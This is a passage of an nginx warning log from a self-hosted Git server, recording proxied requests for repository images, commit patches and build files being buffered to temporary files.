/var/cache/nginx/proxy_temp/4/75/0000004754 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:42:47 [warn] 829#829: *23170 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/75/0000004755 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:43:19 [warn] 829#829: *23176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/75/0000004756 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:44:30 [warn] 829#829: *23192 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/75/0000004757 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:44:45 [warn] 832#832: *23201 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/75/0000004758 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:44:45 [warn] 832#832: *23201 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/75/0000004759 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:45:19 [warn] 832#832: *23210 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/76/0000004760 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:45:37 [warn] 832#832: *23226 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/76/0000004761 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:46:08 [warn] 833#833: *23235 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/76/0000004762 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:46:08 [warn] 833#833: *23235 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/76/0000004763 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:46:29 [warn] 830#830: *23242 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/76/0000004764 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:46:29 [warn] 830#830: *23242 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/76/0000004765 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:46:39 [warn] 830#830: *23250 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/76/0000004766 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:47:11 [warn] 830#830: *23258 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/76/0000004767 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:47:26 [warn] 833#833: *23266 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/76/0000004768 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:50:06 [warn] 833#833: *23277 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/76/0000004769 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 17:59:08 [warn] 839#839: *23677 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/77/0000004770 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 19:16:20 [warn] 843#843: *25327 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/51/0000005515 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 19:17:46 [warn] 843#843: *25337 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/51/0000005516 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 19:18:14 [warn] 843#843: *25344 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/51/0000005517 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 19:19:10 [warn] 841#841: *25348 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/51/0000005518 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 19:19:10 [warn] 841#841: *25348 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/51/0000005519 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/16 12:05:06 [warn] 876#876: *35963 a client request body is buffered to a temporary file /tmp/nginx/body/3/11/0000010113, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr" -2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/11/0000010114 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr" -2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/11/0000010115 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr" -2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/11/0000010116 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr" -2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/11/0000010117 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr" -2026/02/17 02:36:39 [warn] 900#900: *40411 a client request body is buffered to a temporary file /tmp/nginx/body/9/01/0000011019, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr" -2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/02/0000011020 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr" -2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/02/0000011021 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr" -2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/02/0000011022 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr" -2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/02/0000011023 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr" -2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/02/0000011024 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr" -2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/02/0000011025 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png", host: "git.hanmocnn.co.kr" -2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/02/0000011026 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr" -2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/02/0000011027 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr" -2026/02/17 12:59:23 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/03/0000014038 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js.4cf15d9a.map HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js.4cf15d9a.map", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/assets/js/index.js?v=1.25.3" -2026/02/17 13:00:53 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/03/0000014039 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -2026/02/17 13:01:04 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/04/0000014040 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -2026/02/17 13:04:02 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/04/0000014041 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" -2026/02/17 13:04:10 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/04/0000014042 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" -2026/02/17 13:04:17 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/04/0000014043 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -2026/02/17 13:04:29 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/04/0000014044 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" -2026/02/17 13:04:59 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/04/0000014045 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" -2026/02/17 13:07:30 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/04/0000014046 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" -2026/02/17 13:08:45 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/04/0000014047 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" -2026/02/17 13:08:53 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/04/0000014048 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -2026/02/17 13:09:18 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/04/0000014049 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -2026/02/17 13:09:43 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/05/0000014050 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -2026/02/17 13:09:58 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/05/0000014051 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -2026/02/17 13:10:04 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/05/0000014052 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" -2026/02/17 13:10:13 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/05/0000014053 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -2026/02/17 13:11:04 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/05/0000014054 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -2026/02/17 